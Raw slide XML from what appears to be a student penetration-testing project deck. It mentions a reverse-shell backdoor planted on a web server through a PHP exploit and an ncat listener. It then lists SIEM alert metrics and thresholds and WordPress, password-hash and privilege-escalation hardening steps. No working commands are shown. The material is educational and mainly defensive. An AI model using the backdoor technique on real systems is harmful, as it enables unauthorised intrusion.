              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2494" name="Google Shape;2494;p1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495" name="Google Shape;2495;p15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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor Overview</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="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4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What kind of backdoor did you install?</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Reverse shell via .php exploit communicating with an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> listener</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How did you drop it?</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Dropped it to the web server via exploit.sh bash script</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How do you connect to it? </a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connected to the exploit via an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> listener</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2497" name="Google Shape;2497;p156"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="9716225"/>
            <a:ext cx="11879654" cy="3502975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B41486-62F6-43BF-BAE6-F375E3984AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12174775" y="8060268"/>
            <a:ext cx="10041468" cy="20115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157"/>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503" name="Google Shape;2503;p15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17</a:t>
            </a:fld>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15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Excessive HTTP Errors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2509" name="Google Shape;2509;p1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2510" name="Google Shape;2510;p15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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> does this alert monitor?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Count grouped over top 5 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.response.status_code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</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What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> it fires at?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Above 400</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Screenshot of the alert in action:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5C79534-3290-4914-A87D-21CA15123D58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986490" y="6662075"/>
            <a:ext cx="11932709" cy="63722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15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HTTP Request Size Monitor </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2517" name="Google Shape;2517;p1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19</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2518" name="Google Shape;2518;p15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57200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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Sum of http.request.bytes over all documents</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 </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Above 3500</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Screenshot of the alert in action:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{762812F7-8572-4528-A190-60181895572A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782233" y="7277100"/>
            <a:ext cx="11601450" cy="5757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3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2345" name="Google Shape;2345;p1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46" name="Google Shape;2346;p13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47" name="Google Shape;2347;p138"/>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48" name="Google Shape;2348;p138"/>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Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2349" name="Google Shape;2349;p138"/>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Exploits Used</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2350" name="Google Shape;2350;p138"/>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Avoiding Detect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2351" name="Google Shape;2351;p138"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maintaining Access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p16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CPU Usage Monitor </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2525" name="Google Shape;2525;p1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2526" name="Google Shape;2526;p160"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717359" y="1924650"/>
            <a:ext cx="22942800" cy="98667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Which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> does this alert monitor?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Max of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.request.bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> over all documents </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What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threshold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> it fires at? </a:t>
            </a:r>
            <a:endParaRPr sz="4400"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Above 0.5 </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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Screenshot of the alert in action:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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7512FB15-B8B3-4383-B171-7E312EC84EA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2662237" y="6383866"/>
            <a:ext cx="11534775" cy="6400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pic>
        <p:nvPicPr>
          <p:cNvPr id="2532" name="Google Shape;2532;p161"/>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533" name="Google Shape;2533;p161"/>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534" name="Google Shape;2534;p16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21</a:t>
            </a:fld>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p16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b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Hardening Against Wordpress Enumeration on Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="5900" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2540" name="Google Shape;2540;p16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2541" name="Google Shape;2541;p16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Wordpress Enumeration:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">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Disable the WordPress REST API and XML-RPC if it’s not needed. </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You can also configure the web server to block requests to /?author=&lt;number&gt;.</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Prohibit exposure of /wp-admin and /wp-login.php.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why it works:</a:t>
            </a:r>
            <a:endParaRPr sz="4600" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WPScan uses REST API to enumerate users.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML-RPC uses HTTP as it’s transport mechanism for data.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WordPress permalinks can be set to include an author (user) and not exposing WordPress logins adds to brute force attack defense.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to install it:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configure WordPress settings and server to achieve these objectives.</a:t>
            </a:r>
            <a:endParaRPr sz="4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16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b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Hardening Against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5900" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Unprotected and Unsalted Hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5900" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> on Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="5900" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2547" name="Google Shape;2547;p16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2548" name="Google Shape;2548;p16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Unprotected and Unsalted Hashes:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">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Thoroughly secure all passwords in the system with protected and salted hashes via password management tools.</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Salting passwords hides the real hash value by adding an additional bit of data and altering it. This slight alteration makes any brute force attack more challenging to crack.</a:t>
            </a:r>
            <a:endParaRPr sz="44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sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to install it:</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implement a good algorithm to implement a strong number generator on your hashes. </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP suggests SecureRandom as a cryptographically-strong random data.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" i="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6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Privilege Escalation on Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="5900" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2554" name="Google Shape;2554;p16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2555" name="Google Shape;2555;p164"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="108045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1 against Privilege Escalation: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Administrator permissions should be limited to essential personal with privilege given to individuals for specific assignments.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="1" indent="-482600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Be aware of hidden administrators. </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="2" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The local administrator account on workstations and servers.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286000" lvl="2" indent="-457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service accounts with weak or unchanging passwords.</a:t>
            </a:r>
            <a:endParaRPr sz="36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this works:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </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Limiting access to permissions allows for accountability, thus should there be any compromise, the attacker will not be able to escalate.  </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How to install it:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In order to prevent user error a good tool to rely on is auditd to aid in finding any compromised accounts. </a:t>
            </a:r>
            <a:endParaRPr sz="400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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure proper configuration of the sudoers files.  </a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" i="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16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Directory Exploration on Target 2</a:t>
            </a:r>
            <a:endParaRPr sz="5900" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2561" name="Google Shape;2561;p16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25</a:t>
            </a:fld>
